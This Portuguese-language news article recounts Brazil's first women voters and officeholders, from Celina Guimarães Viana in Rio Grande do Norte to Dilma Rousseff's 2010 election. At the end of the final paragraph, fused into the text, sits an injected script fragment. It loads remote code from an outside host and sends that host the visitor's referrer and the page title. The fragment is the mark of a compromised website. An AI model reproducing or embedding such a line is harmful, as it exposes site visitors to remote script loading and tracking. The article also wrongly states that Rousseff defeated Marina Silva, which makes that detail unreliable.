Capa / Cidades / As primeiras mulheres eleitas no Brasil

As primeiras mulheres eleitas no Brasil

A potiguar Celina Guimarães Viana depositou na urna o seu voto e entrou para a história do país

A potiguar Celina Guimarães Viana depositou na urna o seu voto e entrou para a história do país

Dionéia Martins

A conquista do voto feminino foi publicada em 24 de fevereiro de 1932, o primeiro Código Eleitoral do Brasil, após intensa campanha nacional pelos direitos das mulheres. O voto era facultativo para as mulheres, somente em 1946 uma nova alteração no código também tornou obrigatório a votação para as mulheres.
A conquista é fruto de uma longa luta, iniciada antes mesmo da Proclamação da República. A resolução do então presidente Getúlio Vargas dava o direito de participar das votações somente para mulheres casadas (com autorização dos maridos) e às viúvas e solteiras com renda própria.
Desde que o voto feminino no Brasil foi instituído pelo Congresso Nacional, lá se vão 84 anos. Dois anos depois o Rio Grande do Norte elegia a primeira deputada estadual eleita pelo voto popular, Maria do Céu Fernandes , ela chegou solteira aos 24 anos na Assembleia Legislativa , teve seu mandato cassado em 1937 por discordância das ideias getulistas durante o Estado Novo.
Em 1929 a primeira prefeita do Brasil foi eleita também no Rio Grande do Norte. Aos 32 anos de idade, Alzira Soriano assumiu a administração da cidade de Lajes, seu mandato durou pouco mais que um ano, em 1932 perdeu o mandato por não concordar com governo de Getúlio Vargas,
A primeira mulher a votar, foi também do Rio Grande do Norte, no estado existia uma lei que permitia as mulheres votarem. Isso aconteceu antes da aprovação do Código Eleitoral de 1932. A potiguar Celina Guimarães Viana entrou para a história do país ao depositar na urna o seu voto.
A primeira deputada eleita foi do estado de São Paulo em 1934, a médica Carlota Pereira de Queiroz foi eleita deputada federal e fez a voz feminina ser ouvida no Congresso Nacional. Já em 1979, Eunice Michiles, assumiu a suplência da cadeira no senado em substituição ao senador João Bosco que sofreu um acidente vascular e faleceu, entrando para a história como a primeira Senadora pelo Amazonas.
A primeira mulher a governar um estado brasileiro não foi eleita diretamente para o cargo. Em 1983, Iolanda Fleming foi eleita vice-governadora do Acre na chapa encabeçada por Nabor Junior. Em 1986, quando o governador deixou o cargo para disputar uma vaga no Senado, Iolanda se tornou a primeira mulher a governar um estado da federação. Oito anos depois, em 1994, Roseana Sarney se tornaria a primeira mulher a vencer uma eleição majoritária estadual como cabeça de chapa, no Maranhão.
E finalmente em 2010 a primeira presidente mulher da história brasileira foi eleita, Dilma Rousseff, assumiu o comando da nação onde derrotou Marina Silva. As outras mulheres que tentaram chegar ao cargo foi Maria Pio de Abreu em 1989 e Heloisa Helena em 2006 sem sucesso.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top